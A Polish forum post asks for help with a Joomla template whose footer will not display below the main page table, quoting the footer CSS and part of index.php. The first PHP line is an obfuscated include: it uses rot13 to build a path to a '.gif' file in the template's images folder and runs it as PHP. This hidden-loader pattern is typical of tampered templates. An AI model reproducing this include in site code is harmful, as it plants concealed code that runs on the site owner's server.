Witam
mam mały problem ze stronką która juz prawie skończyłem i na sam koniec ZONK !
Strone moża zobaczyc pod adresem :
http://squashpartner.home.pl/squashpartner...ories/index.phpNo i niestety ale stopka nie wyświetla sie tak jak powinna.
Chodzi o to, że jak mam na górze banner1, czyli powiedzmy logo, to jest ono pod główną jakby tabelą strony i wszystko jest ok ,
natomiast stopka nie chce mi wejść pod tą tablę stronę.
Jakies pomysły (IMG:
style_emoticons/default/questionmark.gif)
w pliku CSS mam kod do stopki :
div#stopka{
width:100%;
height:150px;
text-align:center;
background: #fff url(../images/doool.png) top no-repeat;
position: absolut;
}
natomiast w index.php taki kod:
<a name="up" id="up"></a> <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<?php include('functions.php'); ?>
<?php if($this->countModules('user4')) : ?>
<div id="user4"><jdoc:include type="modules" name="user4" /></div><?php endif; ?>
<div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?>
</div></div> <div id="main_bg" class="banner1"> <div id="main_top"><jdoc:include type="modules" name="top" /></div> <?php if($this->countModules('left')) : ?>
<jdoc:include type="modules" name="left" style="rounded" /><?php endif; ?>
<?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
else $maincol_sufix = ''; ?>
<div id="maincolumn"><?php echo $maincol_sufix; ?> <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div> <jdoc:include type="message" />
<div class="nopad"><jdoc:include type="component" /></div> <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
<jdoc:include type="modules" name="right" style="xhtml"/>
<div align="center"><jdoc:include type="modules" name="syndicate" /></div> <?php endif; ?>
Bardzo proszę o pomoc